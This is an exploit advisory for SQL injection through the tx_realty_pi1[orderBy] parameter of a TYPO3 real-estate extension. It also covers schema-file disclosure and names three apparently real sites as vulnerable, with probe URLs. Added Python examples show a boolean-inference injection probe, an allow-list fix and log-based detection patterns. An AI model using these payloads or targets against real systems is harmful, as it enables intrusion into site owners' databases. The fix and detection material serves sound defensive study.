- ############################################################################################
- # Exploit Title : TYPO3 CMS Realty Manager tx_realty_pi1 2.0.0 SQL Injection / Database Disclosure
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 18/02/2019
- # Vendor Homepage : typo3.org ~ oliverklee.de
- # Software Download Link : github.com/TYPO3-svn-archive/realty/archive/master.zip
- extensions.typo3.org/extension/download/realty/2.0.0/zip/
- # Software Information Link : extensions.typo3.org/extension/realty/
- github.com/TYPO3-svn-archive/realty
- # Software Version : 0.1.0 - 0.5.3 and 2.0.0 (all released versions)
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ############################################################################################
- # Description about Software :
- ***************************
- Provides a plugin that displays realty objects (properties, real estate),
- including an image gallery for each object.
- ############################################################################################
- # Impact :
- ***********
- * The Realty Manager (tx_realty_pi1) extension for TYPO3, version 2.0.0 and earlier,
- is prone to an SQL injection vulnerability because it fails to sufficiently sanitize
- user-supplied data (the tx_realty_pi1[orderBy] request parameter) before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable plugin
- and execute arbitrary SQL against the application's database;
- further exploitation may result in unauthorized data manipulation.
- The issue can be exploited with nothing more than a browser.
- Note that an ORDER BY clause cannot be protected by prepared-statement parameter binding
- (a bound value there is treated as a constant, not as a column reference), so the sort key
- must be validated against an allow-list of column names before it reaches the query.
- * The extension's /typo3conf/ext/realty/ext_tables.sql is also readable over HTTP
- where the web server does not block direct access to it. This file is the extension's table
- schema (CREATE TABLE statements for tx_realty_objects, tx_realty_cities and related tables),
- shipped with the publicly available extension source; it is not a database dump and contains
- no stored records or authentication credentials.
- Reading it confirms that the extension is installed and hands an attacker the exact table and
- column names, which shortens the work of crafting injection payloads against the issue above.
- ############################################################################################
- # SQL Injection Exploit :
- ***********************
- /index.php?id=[ID-NUMBER]&tx_realty_pi1%5Bcity%5D=[ID-NUMBER]&tx_realty_pi1%5Bdistrict%5D=[ID-NUMBER]&tx_realty_pi1%5BorderBy%5D=[SQL Injection]
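- The following is an added example (not code from the realty extension or from this advisory) showing, in Python with sqlite3, why a sort key taken from a request parameter such as tx_realty_pi1[orderBy] is an injection sink that parameter binding cannot close, how it can be abused for boolean inference without any visible error, and the allow-list fix. The schema and rows are constructed for the demo; only the table name tx_realty_objects and the columns uid, title and city appear on this page, and the rent column is an assumption.

```python
"""Added example, not code from the TYPO3 realty extension or from the advisory.

Demonstrates why a user-controlled ORDER BY (standing in for the
tx_realty_pi1[orderBy] request parameter) is an SQL injection sink that
parameter binding cannot close, how it can be abused for boolean inference
without any error message, and the allow-list fix.

The sqlite3 schema and rows are constructed for the demo; only the table name
tx_realty_objects and the columns uid, title and city appear on the page, the
rent column is an assumption.
"""
import sqlite3

SCHEMA = """
CREATE TABLE tx_realty_objects (
    uid   INTEGER PRIMARY KEY,
    title TEXT    NOT NULL,
    city  INTEGER NOT NULL,
    rent  INTEGER NOT NULL
);
INSERT INTO tx_realty_objects VALUES (1, 'Loft',  1, 1200);
INSERT INTO tx_realty_objects VALUES (2, 'Flat',  1,  800);
INSERT INTO tx_realty_objects VALUES (3, 'House', 1, 2500);
"""


def connect():
    """In-memory database populated with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def list_objects_unsafe(conn, city, order_by):
    """Vulnerable pattern: the sort expression is concatenated into the SQL.

    The city filter is bound as a parameter and is safe. The ORDER BY part
    cannot be bound (a bound value there is a constant, not a column
    reference), so whatever the client sends becomes SQL text.
    """
    sql = ("SELECT uid, title FROM tx_realty_objects "
           "WHERE city = ? ORDER BY " + order_by)
    return [row[0] for row in conn.execute(sql, (city,))]


ALLOWED_ORDER_BY = {
    # request value -> column actually used in the statement
    "uid": "uid",
    "title": "title",
    "rent": "rent",
}


def list_objects_safe(conn, city, order_key, descending=False):
    """Hardened form: the request value is a lookup key, never SQL text."""
    column = ALLOWED_ORDER_BY.get(order_key)
    if column is None:
        raise ValueError("unsupported sort key: %r" % (order_key,))
    direction = "DESC" if descending else "ASC"
    sql = ("SELECT uid, title FROM tx_realty_objects "
           "WHERE city = ? ORDER BY %s %s" % (column, direction))
    return [row[0] for row in conn.execute(sql, (city,))]


def probe_boolean(conn, condition_sql):
    """Boolean inference through the unsafe ORDER BY.

    The payload sorts by rent when condition_sql is true and by uid when it
    is false. Comparing the returned order with a known sort reveals the
    truth value, one bit per request, with no error message needed.
    """
    payload = "(CASE WHEN (%s) THEN rent ELSE uid END)" % condition_sql
    return list_objects_unsafe(conn, 1, payload) == list_objects_unsafe(conn, 1, "rent")


def unsafe_raises_db_error(conn, order_by):
    """True if the vulnerable query fails with a database syntax error,
    the behaviour behind the MariaDB error quoted further down the page."""
    try:
        list_objects_unsafe(conn, 1, order_by)
    except sqlite3.OperationalError:
        return True
    return False


def safe_rejects(conn, order_key):
    """True if the hardened query refuses the sort key before touching SQL."""
    try:
        list_objects_safe(conn, 1, order_key)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("unsafe, orderBy=title   ->", list_objects_unsafe(db, 1, "title"))
    print("unsafe, orderBy=1'      -> db error:", unsafe_raises_db_error(db, "1'"))
    print("unsafe, inference probe ->", probe_boolean(db, "(SELECT count(*) FROM sqlite_master) >= 1"))
    print("safe,   rent desc       ->", list_objects_safe(db, 1, "rent", descending=True))
    print("safe,   orderBy=1'      -> rejected:", safe_rejects(db, "1'"))
```

- The probe_boolean helper is the practical reason an ORDER BY sink matters even when errors are suppressed: an attacker does not need the MariaDB message, only two distinguishable result orders. The fix maps the request value through a fixed dictionary and validates the direction separately, so no request byte ever becomes SQL.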
- # Database Disclosure Exploit :
- ***************************
- /typo3conf/ext/realty/ext_tables.sql
- ############################################################################################
- # Example Vulnerable Sites :
- *************************
- [+] dietmar-buecher.de/index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5Bdistrict%5D=11818&tx_realty_pi1%5BorderBy%5D=1%27
- [+] fuggerstadtimmobilien.de/typo3conf/ext/realty/ext_tables.sql
- [+] baden-baden-exklusiv-immobilien.de/typo3conf/ext/realty/ext_tables.sql
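- The following is an added example (not code from this advisory or from the realty extension) with detection logic for the two request patterns listed above, run over constructed Apache combined-format access log lines: probes of tx_realty_pi1[orderBy] with values that are not legitimate sort keys or that carry SQL syntax, and fetches of the extension's ext_tables.sql, which typically precede injection attempts as reconnaissance. The log lines, client addresses and the ALLOWED_ORDER_BY set are assumptions for the demo; the real extension's sort keys should be taken from its code.

```python
"""Added example, not code from the advisory or from the TYPO3 realty extension.

Detection logic for the two request patterns described on this page, run over
constructed Apache combined-format access log lines: probes of the
tx_realty_pi1[orderBy] parameter with values that are not legitimate sort keys
or that carry SQL syntax, and fetches of the extension's ext_tables.sql schema
file, which precede injection attempts as reconnaissance.

The log lines, client addresses and the ALLOWED_ORDER_BY set are assumptions
for the demo; the real extension's sort keys should be taken from its code.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample log (documentation-range IPs, fictional timestamps).
SAMPLE_LOG = """\
203.0.113.5 - - [18/Feb/2019:14:07:00 +0100] "GET /index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5Bdistrict%5D=11818&tx_realty_pi1%5BorderBy%5D=1%27 HTTP/1.1" 500 2311 "-" "Mozilla/5.0"
203.0.113.5 - - [18/Feb/2019:14:07:03 +0100] "GET /typo3conf/ext/realty/ext_tables.sql HTTP/1.1" 200 9120 "-" "Mozilla/5.0"
198.51.100.7 - - [18/Feb/2019:14:08:11 +0100] "GET /index.php?id=33&tx_realty_pi1%5Bcity%5D=1&tx_realty_pi1%5BorderBy%5D=title HTTP/1.1" 200 18455 "-" "Mozilla/5.0"
198.51.100.9 - - [18/Feb/2019:14:09:40 +0100] "GET /index.php?id=33&tx_realty_pi1%5BorderBy%5D=(CASE%20WHEN%20(SELECT%201)%3D1%20THEN%20title%20ELSE%20uid%20END) HTTP/1.1" 200 18455 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)

# Sort keys the plugin's own UI would send (assumption for the demo).
ALLOWED_ORDER_BY = {"uid", "title", "city", "district", "rent"}

# Tokens that have no business in a sort key: quotes, comment and statement
# delimiters, and SQL keywords typical of ORDER BY payloads.
SQL_META = re.compile(
    r"['\"();#]|--|/\*|\b(select|union|case|when|sleep|benchmark|if|or|and)\b",
    re.IGNORECASE,
)

SCHEMA_PATH = "/typo3conf/ext/realty/ext_tables.sql"


def analyse_line(line):
    """Return (rule, client_ip, evidence) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = urlsplit(m.group("target"))
    path = unquote(target.path)
    if path.endswith(SCHEMA_PATH):
        return ("realty_schema_recon", m.group("ip"), path)
    # parse_qs percent-decodes both names and values, so the bracketed
    # TYPO3 parameter name comes back as tx_realty_pi1[orderBy].
    params = parse_qs(target.query, keep_blank_values=True)
    for value in params.get("tx_realty_pi1[orderBy]", []):
        if value in ALLOWED_ORDER_BY:
            continue
        if SQL_META.search(value):
            return ("realty_orderby_sqli", m.group("ip"), value)
        return ("realty_orderby_unexpected", m.group("ip"), value)
    return None


def analyse_log(text):
    """Findings for every line of an access log, in file order."""
    return [f for f in (analyse_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for rule, ip, evidence in analyse_log(SAMPLE_LOG):
        print("%-26s %-14s %s" % (rule, ip, evidence))
```

- The allow-list check comes first so that legitimate sort keys never hit the keyword regex; anything else is flagged, and the regex only decides between an outright SQL payload and an unexpected value worth a look. A schema fetch followed within seconds by an orderBy probe from the same address, as in the first two sample lines, is the sequence to alert on.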
- ############################################################################################
- # Example SQL Database Error :
- ****************************
- You have an error in your SQL syntax; check the manual that corresponds to your
- MariaDB server version for the right syntax to use near 'LIMIT 0,1' at line 1
- The last built query
- *****************
- SELECT COUNT(*) AS oelib_counter
-   FROM tx_realty_objects
-   INNER JOIN tx_realty_cities ON tx_realty_objects.city = tx_realty_cities.uid
-   WHERE 1=1
-     AND tx_realty_objects.deleted=0
-     AND tx_realty_objects.t3ver_state<=0
-     AND tx_realty_objects.pid<>-1
-     AND tx_realty_objects.hidden=0
-     AND tx_realty_objects.starttime<=1550508420
-     AND (tx_realty_objects.endtime=0 OR tx_realty_objects.endtime>1550508420)
-     AND tx_realty_cities.deleted=0
-     AND house_type = 2
-     AND tx_realty_objects.city = 1
-     AND tx_realty_objects.project_id = LIMIT 0,1
- #0 /home/jail/home/buecher/htdocs/typo3conf/ext/oelib/class.tx_oelib_db.php(394):
- tx_oelib_db::select('COUNT(*) AS oel...', 'tx_realty_objec...', '1=1 AND tx_real...', '', '', '0,1')
- Two details of this trace are worth noting. First, the fragment that breaks the statement is
- tx_realty_objects.project_id = LIMIT 0,1, an empty right-hand value, and the statement carries
- no ORDER BY clause at all (the grouping and ordering arguments of the select() call are both
- empty strings). The trace shows request data reaching the SQL layer unvalidated, but it does
- not by itself demonstrate injection through tx_realty_pi1[orderBy]. Second, the site returns
- the complete SQL statement and a stack trace with server filesystem paths to an anonymous
- visitor; verbose database errors like this are a finding in their own right and should be
- disabled in production.
- ############################################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ############################################################################################